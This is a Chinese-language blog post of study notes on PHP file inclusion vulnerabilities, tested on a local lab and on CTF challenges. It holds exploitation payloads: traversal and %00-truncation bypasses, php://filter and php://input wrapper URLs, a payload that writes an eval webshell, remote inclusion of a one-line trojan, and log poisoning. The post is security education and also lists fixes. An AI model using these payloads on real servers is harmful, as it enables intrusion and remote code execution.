31:WEB漏洞-文件操作之文件包含漏洞全解

已于 2022-04-22 14:54:39 修改
阅读量1.5k 收藏 12
点赞数
分类专栏: web 小迪笔记 文章标签: 文件包含
于 2022-04-03 11:46:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123935054
版权

原作者文章:(https://www.cnblogs.com/zhengna/p/15637657.html)
本文基于原作者的文章进行相应复现,作为自己的笔记,仅供参考

31:WEB漏洞-文件操作之文件包含漏洞全解

文章目录

思维导图

img

知识点

知识点

文件包含漏洞

原理,检测,类型,利用,修复等

原理:将文件以脚本执行

文件包含各个脚本代码

ASP,PHP,JSP,ASPXdeng
<!--#include file="1.asp" -->
<!--#include file="1.aspx" -->
<c:import url="http://thief.one/1.jsp">
<jsp:include page="head.jsp" />
<?php include('test.php'); ?>

类型

1、本地包含 LFI(Local File Inclusion) 比较鸡肋 能够编辑文件或上传文件上去
2、远程包含 RFI(Remote File Inclusion) 个人博客 任意在文件上添加代码 可控性强

漏洞检测

白盒测试:代码审计
黑盒测试:
1、漏扫工具
2、公开漏洞
3、手工看参数值及功能点

利用

本地包含-

1、无限制

http://127.0.0.1/include.php?filename=1.txt
http://127.0.0.1/include.php?filename=…/…/www.txt

…/表示返回上一级

2、有限制
%00截断:条件:magic_quotes_gpc = Off     php版本<5.3.4

filename=…/…/www.txt%00
长度截断:条件:windows,点号需要长于256;linux长于4096 php版本<5.2.8
get请求方式接受有限制

远程包含-无限制,有限制

前提条件:
allow_url_fopen = On
allow_url_include = On

http://127 .0.0.1/include.php?filename=http://www.yucedu.com/readme .txt
http://127 .0.0.1/include.php?filename=http://www.yucedu.com/readme .txt%20
http://127 .0.0.1/include.php?filename=http://www.yucedu.com/readme .txt%23
http://127 .0.0.1/include.php?filename=http://www.yucedu.com/readme.txt?

各种协议流玩法

参考链接:https://www.cnblogs.com/endust/p/11804767.html

php://

1.读取文件源码用法
http://127.0.0.1:8080/include.php?filename=php://filter/read=convert.base64-encode/resource=[文件名]
2.执行php代码用法
http://127.0.0.1:8080/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
3.写入一句话木马用法
http://127.0.0.1:8080/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
data://——执行php代码用法

http://127.0.0.1:8080/include.php?filename=data://text/plain,<?php%20phpinfo();?>
http://127.0.0.1:8080/include.php?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

file://
1.file://[文件的绝对路径和文件名]

http://127.0.0.1:8080/include.php?filename=file:///D:/phpstudy/PHPTutorial/WWW/1.txt

2.[文件的相对路径和文件名]

http://127.0.0.1:8080/include.php?filename=./phpinfo.txt

其他参考:https://www.cnblogs.com/endust/p/11804767.html

文件包含修复方案:

<1>固定后缀:比如include($filename.“html”);,有绕过风险
<2>固定文件:比如include(“1.txt”);
<3>WAF产品。

伪协议参考:
https://www.cnblogs.com/endust/p/11804767.html

本课重点

  • 案例1:本地文件包含代码测试-原理
  • 案例2:远程文件包含代码测试-原理
  • 案例3:各种协议流提交流测试-协议
  • 案例4:CTF-南邮大,i春秋百度杯真题-白盒
  • 案例5:某CMS程序文件包含利用-黑盒

案例1:本地文件包含代码测试-原理

无限制

文件包含漏洞原理,简单说,就是将文件以脚本执行。比如服务器本地有一个1.txt文件(里面是一个php脚本),还有一个文件包含漏洞。

include.php

<?php $filename = $_GET [ 'filename' ]; include ( $filename ); ?>

1.txt

<?php phpinfo(); ?>

如果单纯地打开1.txt文件,里面的脚本不会执行,浏览器直接显示文件内容。如下图所示。

在这里插入图片描述

如果配合文件包含漏洞,就会将文件以脚本执行。

在这里插入图片描述

还可以执行其他文件夹下的脚本。

在这里插入图片描述

有限制

include.php如下所示,限制文件后缀为.html

<?php $filename = $_GET [ 'filename' ]; include ( $filename . "html" ); ?>

此时 包含本地文件1.txt时报错,不再执行脚本

在这里插入图片描述

绕过方法1:%00截断
%00截断:条件:magic_quotes_gpc = Off php版本<5.3.4
http://127.0.0.1:8080/include.php?filename=../../../www.txt%00
长度截断:条件:windows,点号需要长于256;linux长于4096

在这里插入图片描述

在这里插入图片描述

绕过方法2:长度截断,

用多个点号或者/.
在filename=1.txt后面输入多个点号。windows点号需要长于256;linux长于4096

img

img
我:
关于长度截断复现失败了(可能之前修改了环境,弄了一个小时了,小声嘀咕)等有空在补吧
在这里插入图片描述

案例2:远程文件包含代码测试-原理

无限制

php远程文件包含的前提条件是开启了allow_url_include

攻击者服务器上有一个1.txt,内容如下
在这里插入图片描述

若目标网站上有一个文件上传漏洞(无限制)
在这里插入图片描述

include.php

<?php
$filename=$_GET['filename'];
include($filename);
?>

地址为本地靶场www.xh.com
那么可以在目标网站上包含攻击者服务器上的文件,执行脚本。

在这里插入图片描述

若把文件内容改为一句话木马

在这里插入图片描述

则可以利用文件包含漏洞执行使用菜刀等工具连接目标服务器。

在这里插入图片描述

有限制

include.php如下所示,限制文件后缀为.html

<?php 
$filename=$_GET['filename'];
include($filename.".html");
?>

此时 包含远程文件readme.txt时报错,不再执行脚本

在这里插入图片描述

绕过方法1:在后面加?

空白是因为有文件,连接成功在这里插入图片描述

绕过方法2:在后面加%23

在这里插入图片描述

绕过方法3:在后面加%20

img
我:
失败了
不过%00 可以
在这里插入图片描述

案例3:各种协议流提交流测试-协议

各协议的利用条件和方法

img

各语言对协议的支持

img

<1>php://filter——读取文件源码

php://filter读取文件源码,结果base64编码,需要自行解码。

http://127.0.0.1/include.php?filename=php://filter/read=convert.base64-encode/resource=1.txt

在这里插入图片描述

在这里插入图片描述

<2>php://input——执行php代码

在这里插入图片描述

php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>

在这里插入图片描述

在这里插入图片描述

<3>php://input——写入一句话木马

参考:https://www.cnblogs.com/endust/p/11804767.html

<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

在这里插入图片描述

在这里插入图片描述

<4>file://访问本地文件

在这里插入图片描述

在这里插入图片描述

<5>data://执行php代码

在这里插入图片描述

data://text/plain,<?php%20phpinfo();?>

在这里插入图片描述

案例4:CTF-南邮大,i春秋百度杯真题-白盒

1.某CTF题

<1>网站地址:http://4.chinalover.sinaapp.com/web7/index.php
<2>尝试读取index.php内容,读取成功。
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

<3>将返回值在本地base64解码,拿到flag。

在这里插入图片描述

2. i春秋某Web Include CTF题

<1>网站:https://www.ichunqiu.com/battalion?t=1&r=0

在这里插入图片描述

首页打开如下图所示,说明含有文件包含漏洞。

在这里插入图片描述
在这里插入图片描述

<2>尝试读取本目录下的文件结构,成功。

在这里插入图片描述

<3>尝试读取dle345ae.php文件,成功拿到flag。

没反应,‘cat<xx.php’请求方式可能有错误
在这里插入图片描述

<4>还可以使用php://filter协议,读取文件内容后,到本地base64解码,拿到flag。

在这里插入图片描述

在这里插入图片描述

案例5:某CMS程序文件包含利用-黑盒

靶场为本地搭建

<1>首页打开如下

在这里插入图片描述

<2>在网上搜索易酷CMS是否有公开漏洞,搜到有本地文件包含漏洞。

img

<3>将一句话木马写入日志中

在这里插入图片描述

<4>服务器生成日志,里面有一句话木马。

在这里插入图片描述

<5>利用文件包含漏洞与一句话木马,成功执行脚本。

在这里插入图片描述

明月清风~~
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF [第三章 web进阶]逻辑漏洞
m0_49025459的博客
04-21 1250
这个就很离谱,我们直接购买FLAG我们发现钱不够 但是url上显示了支付的钱和商品数,连抓包都不用,直接将这个cost修改成负的就行了
[极客大挑战 2019]BuyFlag_WP
Accompany的博客
01-24 1945
标题
文件包含(借助CTFHUB,buuctf)
最新发布
ndjnddjxn的博客
04-24 790
定义:使用文件包含函数将文件包起来,直接使用包含文件的代码为了灵活包含文件,将包含文件设置为变量,通过动态变量来引入需要包含文件时,用户可对变量值可控而服务器没有对变量值进行合理的校验或者校验被绕过导致的,通常为php语言。00截断属于RCE绕过,遇到00自动停止长度截断包含日志文件包含session二、include 表达式。
WEB攻防-购买支付逻辑漏洞&数据篡改&请求重放&接口替换
ran的博客
04-20 2412
75.解决这种安全问题的方法其实也很简单,我们可以在数据包内看到数据包内是存在id值的,通过这个值就可以对订单商品以及订单金额进行控制,我们后面更改订单编号就是没有用的,需要同时对二者进行更改才可行,如果二者不对应就会出现逻辑错误,弹出错误页面。23.其实也并不是这样,一方面网站可能不会认可你自己的支付接口,另一方面,如果你将接口修改了,那么网站会不会接收你的回调信息呢。21.如果将支付的接口信息进行更改,改到你自己的名下,那么在付款的时候就会将资金付到你自己的名下,并且网站也会认定你是付款成功。
文件包含漏洞详解
热门推荐
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
系统漏洞解析含flag
旺仔Sec&blog
02-24 5203
6. 通过本地 PC 中渗透测试平台 Kali 下载 flag.txt 文件,将文件中的 Flag。1. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。2. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。3. 通过本地 PC 中渗透测试平台 Kali 渗透进入目标靶机,将挂载目标靶机文。单(将 IP 地址替换为 0.0.0.0) ,将查看命令作为 Flag 提交;文件系统中该文件的位置,并将搜索所需命令作为 Flag 提交;
第32天:WEB漏洞-文件操作文件下载读取全解1
08-03
1.文件被解析,则是文件包含漏洞 2.显示源代码,则是文件读取漏洞 3.提示文件下载,则是文件下载漏洞
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-反序列化之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码及命令执行漏洞全解Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
第37天:WEB漏洞-反序列化之PHP&JAVA全解(上)1
08-03
WEB漏洞-反序列化之PHP&JAVA全解(上) 在 WEB 应用程序中,反序列化是一种常见的漏洞,攻击者可以通过反序列化来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHP 和 JAVA 中,反序列化漏洞尤其常见,本文将...
文件包含漏洞学习(3)
yzl_007的博客
09-18 435
文件包含漏洞学习(3) 我们看到这一段代码 <?php $filename = $_GET['filename']; include($filename . ".html"); ?> 这里函数后面又添加了.html为后缀,对于有限制的文件包含漏洞,我们可以通过一些方法来绕过,不过也有先决条件:magic_quotes_gpc = Off php版本<5.3.4 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KIyNvIaW-1631894
浅谈漏洞思路分享-逻辑漏洞(支付系统篇)
qq_52612931的博客
04-07 966
渗透测试项目中网站哪里可能存在逻辑漏洞呢? 这里总结了三大类关于登录页面、会员系统、支付系统可能出现的逻辑漏洞情况,参考之前hackctf公众号里总结的逻辑漏洞位置一张图提供思路,内容比较多所以分开来写,同时参考网上文章及个人案例进行了总结补充,希望大家多多关注。
网安赛题整理
武恩赐
02-13 1150
网安赛题整理
网络渗透测试实验四
qq_63016521的博客
11-24 642
网络渗透测试实验四
文件包含漏洞学习
Wawyw's Blog
05-29 643
1、概述 什么是文件包含? 将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作漏洞产生原因 文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码。 示例: <?php $filename=$_GET['filename']; include($filename); ?> 可以看出,改变URL中filename的值即可改变代码中包含文件。 PHP中的文件包含函数 include 函数出现错误时,会抛出警告,但程序仍继续执行。 i
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1758
在php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php的文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
CTF_Web文件包含与php伪协议
AFCC_的博客(Web_Dog)
08-11 2729
前言 在CTF题目中文件包含和伪协议使用也是常见的一类题目,常见的主要使用include()、require()等函数与其搭配产生可利用的漏洞或命令执行。 0x01 什么是文件包含 在开发的过程中,开发人员为了更好地使用代码的重用性,不重复的去编写一部分函数,从而引入了文件包含函数,通过文件包含函数将文件包含进来,使用包含文件的代码,降低开发的代码工作量,在同一个文件里面可以包含另外一个或多个文件进而使用他们内部定义的函数。 0x02 文件包含漏洞文件包含的过程中,如果没有对可包含文件类型、用户可控的
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1506
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTF—Web文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值